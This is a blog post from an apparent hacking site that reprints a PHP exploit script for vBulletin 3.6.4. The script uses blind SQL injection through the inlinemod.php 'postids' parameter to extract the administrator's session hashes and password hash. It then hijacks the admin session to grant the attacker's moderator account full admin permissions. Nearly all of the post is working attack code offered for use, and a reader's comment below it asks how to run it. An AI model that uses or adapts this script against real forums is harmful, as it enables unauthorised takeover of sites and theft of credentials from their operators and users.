Saturday, August 6, 2011
----------------------------------------------------------------------------- |
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege |
escalation by session hijacking exploit |
mail: retrog at alice dot it |
Works regardless of php.ini settings, you need a Super Moderator account |
to copy posts among threads, to be launched while admin is logged in to |
the control panel, this will give you full admin privileges |
note: this will flood the forum with empty threads even! |
----------------------------------------------------------------------------- |
----------------------------------------------------------------------------- |
Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS |
host: target server (ip/hostname) |
user/pass: you need a moderator account |
-p[port]: specify a port other than 80 |
-P[ip:port]: specify a proxy |
php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80 |
php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81 |
----------------------------------------------------------------------------- |
ini_set("max_execution_time",0); |
ini_set("default_socket_timeout",5); |
function quick_dump($string) |
$result='';$exa='';$cont=0; |
for ($i=0; $i<=strlen($string)-1; $i++) |
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) |
{$result.=" ".$string[$i];} |
if (strlen(dechex(ord($string[$i])))==2) |
{$exa.=" ".dechex(ord($string[$i]));} |
{$exa.=" 0".dechex(ord($string[$i]));} |
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} |
return $exa."\r\n".$result; |
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; |
function sendpacketii($packet) |
global $proxy, $host, $port, $html, $proxy_regex; |
$ock=fsockopen(gethostbyname($host),$port); |
echo 'No response from '.$host.':'.$port; die; |
$c = preg_match($proxy_regex,$proxy); |
echo 'Not a valid proxy...';die; |
$parts=explode(':',$proxy); |
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; |
$ock=fsockopen($parts[0],$parts[1]); |
echo 'No response from proxy...';die; |
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { |
$existing_post=(int)$argv[6]; |
for ($i=3; $i<$argc; $i++){ |
$temp=$argv[$i][0].$argv[$i][1]; |
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} |
$port=str_replace("-p","",$argv[$i]); |
$proxy=str_replace("-P","",$argv[$i]); |
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} |
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} |
$data="vb_login_username=$user"; |
$data.="&vb_login_password="; |
$data.="&vb_login_md5password=$pass"; |
$data.="&vb_login_md5password_utf=$pass"; |
$packet="POST ".$p."login.php HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."login.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
$temp=explode("Set-Cookie: ",$html); |
for ($i=1; $i<count($temp); $i++) |
$temp2=explode(" ",$temp[$i]); |
$cookie.=" ".trim($temp2[0]); |
if (!eregi("sessionhash",$cookie)){die("failed to login...");}$temp=str_replace(" ","",$cookie);$temp=str_replace("sessionhash","",$temp); |
$temp=str_replace("lastvisit","",$temp);$temp=str_replace("lastactivity","",$temp);$temp=explode("=",$temp);$temp=explode(";",$temp[1]); |
$cookie_prefix=trim($temp[1]);echo "cookie prefix -> ".$cookie_prefix."\n"; |
$chars=array_merge($chars,range(48,57)); |
echo "admim user id -> "; |
while (!strstr($uid,chr(0))) |
for ($i=0; $i<=255; $i++) |
$data.="&do=docopyposts"; |
$data.="&destforumid=$forumid"; |
$data.="&forumid=$forumid"; |
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*"; |
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: it\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
$temp=explode("showthread.php?t=",$html); |
$temp2=explode("\n",$temp[1]); |
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: it\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} |
if (eregi("join date",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;} |
die("\nExploit failed..."); |
if (trim($uid)==""){die("\nExploit failed...");}else{echo "\nvulnerable!";} |
function my_encode($my_string) |
for ($k=0; $k<=strlen($my_string)-1; $k++) |
$encoded.=ord($my_string[$k]); |
if ($k==strlen($my_string)-1) {$encoded.=")";} |
echo "\nyour user id -> "; |
while (!strstr($my_uid,chr(0))) |
for ($i=0; $i<=255; $i++) |
$data.="&do=docopyposts"; |
$data.="&destforumid=$forumid"; |
$data.="&forumid=$forumid"; |
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=".my_encode($user)."/**/LIMIT/**/1/*"; |
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: it\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} |
$temp=explode("showthread.php?t=",$html); |
$temp2=explode("\n",$temp[1]); |
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: it\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("join date",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;} |
die("\nExploit failed..."); |
$chars=array_merge($chars,range(48,57)); |
$chars=array_merge($chars,range(97,102)); |
echo "\nsession hash -> "; |
while (!strstr($sess_hash,chr(0))) |
for ($i=0; $i<=255; $i++) |
$data.="&do=docopyposts"; |
$data.="&destforumid=$forumid"; |
$data.="&forumid=$forumid"; |
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; |
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: it\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} |
$temp=explode("showthread.php?t=",$html); |
$temp2=explode("\n",$temp[1]); |
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: it\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("join date",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;} |
die("\nExploit failed..."); |
echo "\nuser password hash -> "; |
while (!strstr($my_hash,chr(0))) |
for ($i=0; $i<=255; $i++) |
$data.="&do=docopyposts"; |
$data.="&destforumid=$forumid"; |
$data.="&forumid=$forumid"; |
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; |
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} |
$temp=explode("showthread.php?t=",$html); |
$temp2=explode("\n",$temp[1]); |
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("join date",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;} |
die("\nExploit failed..."); |
echo "\ncp session hash -> "; |
while (!strstr($cpsess_hash,chr(0))) |
for ($i=0; $i<=255; $i++) |
$data.="&do=docopyposts"; |
$data.="&destforumid=$forumid"; |
$data.="&forumid=$forumid"; |
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; |
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
$temp=explode("showthread.php?t=",$html); |
$temp2=explode("\n",$temp[1]); |
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie."; \r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} |
if (eregi("join date",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;} |
die("\nExploit failed..."); |
$packet ="GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; bbuserid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
$temp=explode("adminhash\" value=\"",$html); |
$temp2=explode("\"",$temp[1]); |
echo "adminhash ->".$adminhash."\n"; |
if ($adminhash<>"") {echo "\ndone! you are in... updating ".$user." rights";} |
else {die("\nexploit failed...");} |
$my_email="suntzu@suntzu.com"; |
$data.="&adminhash=$adminhash"; |
$data.="&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid; |
$data.="&user%5Busername%5D=$user"; |
$data.="&user%5Bemail%5D=$my_email"; |
$data.="&user%5Blanguageid%5D=0"; |
$data.="&user%5Busertitle%5D=Admin"; |
$data.="&user%5Bcustomtitle%5D=0"; |
$data.="&user%5Bhomepage%5D="; |
$data.="&user%5Bbirthday%5D%5Bmonth%5D=0"; |
$data.="&user%5Bbirthday%5D%5Bday%5D="; |
$data.="&user%5Bbirthday%5D%5Byear%5D="; |
$data.="&user%5Bshowbirthday%5D=0"; |
$data.="&user%5Bsignature%5D="; |
$data.="&user%5Bicq%5D="; |
$data.="&user%5Baim%5D="; |
$data.="&user%5Byahoo%5D="; |
$data.="&user%5Bmsn%5D="; |
$data.="&user%5Bskype%5D="; |
$data.="&options%5Bcoppauser%5D=0"; |
$data.="&user%5Bparentemail%5D=$my_email"; |
$data.="&user%5Breferrerid%5D="; |
$data.="&user%5Bipaddress%5D="; |
$data.="&user%5Bposts%5D=0"; |
$data.="&userfield%5Bfield1%5D="; |
$data.="&userfield%5Bfield2%5D="; |
$data.="&userfield%5Bfield3%5D="; |
$data.="&userfield%5Bfield4%5D="; |
$data.="&user%5Busergroupid%5D=6"; |
$data.="&user%5Bdisplaygroupid%5D=-1"; |
$data.="&user%5Bmembergroupids%5D%5B%5D=5"; |
$data.="&options%5Bshowreputation%5D=1"; |
$data.="&user%5Breputation%5D=10"; |
$data.="&user%5Bwarnings%5D=0"; |
$data.="&user%5Binfractions%5D=0"; |
$data.="&user%5Bipoints%5D=0"; |
$data.="&options%5Badminemail%5D=1"; |
$data.="&options%5Bshowemail%5D=0"; |
$data.="&options%5Binvisible%5D=0"; |
$data.="&options%5Bshowvcard%5D=0"; |
$data.="&options%5Breceivepm%5D=1"; |
$data.="&options%5Breceivepmbuddies%5D=0"; |
$data.="&options%5Bemailonpm%5D=0"; |
$data.="&user%5Bpmpopup%5D=0"; |
$data.="&options%5Bshowsignatures%5D=1"; |
$data.="&options%5Bshowavatars%5D=1"; |
$data.="&options%5Bshowimages%5D=1"; |
$data.="&user%5Bautosubscribe%5D=-1"; |
$data.="&user%5Bthreadedmode%5D=0"; |
$data.="&user%5Bshowvbcode%5D=1"; |
$data.="&user%5Bstyleid%5D=0"; |
$data.="&adminoptions%5Badminavatar%5D=0"; |
$data.="&adminoptions%5Badminprofilepic%5D=0"; |
$data.="&user%5Btimezoneoffset%5D=0"; |
$data.="&options%5Bdstauto%5D=1"; |
$data.="&options%5Bdstonoff%5D=0"; |
$data.="&user%5Bdaysprune%5D=-1"; |
$data.="&user%5Bjoindate%5D%5Bmonth%5D=2"; |
$data.="&user%5Bjoindate%5D%5Bday%5D=26"; |
$data.="&user%5Bjoindate%5D%5Byear%5D=2007"; |
$data.="&user%5Bjoindate%5D%5Bhour%5D=14"; |
$data.="&user%5Bjoindate%5D%5Bminute%5D=39"; |
$data.="&user%5Blastactivity%5D%5Bmonth%5D=2"; |
$data.="&user%5Blastactivity%5D%5Bday%5D=26"; |
$data.="&user%5Blastactivity%5D%5Byear%5D=2007"; |
$data.="&user%5Blastactivity%5D%5Bhour%5D=14"; |
$data.="&user%5Blastactivity%5D%5Bminute%5D=58"; |
$data.="&user%5Blastpost%5D%5Bmonth%5D=0"; |
$data.="&user%5Blastpost%5D%5Bday%5D="; |
$data.="&user%5Blastpost%5D%5Byear%5D="; |
$data.="&user%5Blastpost%5D%5Bhour%5D="; |
$data.="&user%5Blastpost%5D%5Bminute%5D="; |
$data.="&userid=".$mu_uid; |
$data.="&odisplaygroupid=0"; |
$data.="&userfield%5Bfield1_set%5D=1"; |
$data.="&userfield%5Bfield2_set%5D=1"; |
$data.="&userfield%5Bfield3_set%5D=1"; |
$data.="&userfield%5Bfield4_set%5D=1"; |
$packet ="POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
$data.="&adminhash=".$adminhash; |
$data.="&adminpermissions%5Bcanadminsettings%5D=1"; |
$data.="&adminpermissions%5Bcanadminstyles%5D=1"; |
$data.="&adminpermissions%5Bcanadminlanguages%5D=1"; |
$data.="&adminpermissions%5Bcanadminforums%5D=1"; |
$data.="&adminpermissions%5Bcanadminthreads%5D=1"; |
$data.="&adminpermissions%5Bcanadmincalendars%5D=1"; |
$data.="&adminpermissions%5Bcanadminusers%5D=1"; |
$data.="&adminpermissions%5Bcanadminpermissions%5D=1"; |
$data.="&adminpermissions%5Bcanadminfaq%5D=1"; |
$data.="&adminpermissions%5Bcanadminimages%5D=1"; |
$data.="&adminpermissions%5Bcanadminbbcodes%5D=1"; |
$data.="&adminpermissions%5Bcanadmincron%5D=1"; |
$data.="&adminpermissions%5Bcanadminmaintain%5D=1"; |
$data.="&adminpermissions%5Bcanadminplugins%5D=1"; |
$data.="&dismissednews="; |
$data.="&userid=".$my_uid; |
$data.="&oldpermissions=98300"; |
$data.="&adminpermissions%5Bcanadminupgrade%5D=0"; |
$packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0\r\n"; |
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; |
$packet.="Referer: http://".$host.$path."profile.php\r\n"; |
$packet.="Accept-Language: en\r\n"; |
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; |
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; |
$packet.="Host: ".$host."\r\n"; |
$packet.="Content-Length: ".strlen($data)."\r\n"; |
$packet.="Pragma: no-cache\r\n"; |
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n"; |
$packet.="Connection: Close\r\n\r\n"; |
echo "\nnow go to http://".$host.$path."admincp/index.php and login to the control panel..."; |
?>
- Copyright ©
.Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -
Hello man, This can hack Vbulliten 3.6.4? If so can you give me details of how to make this thing work?
ReplyDelete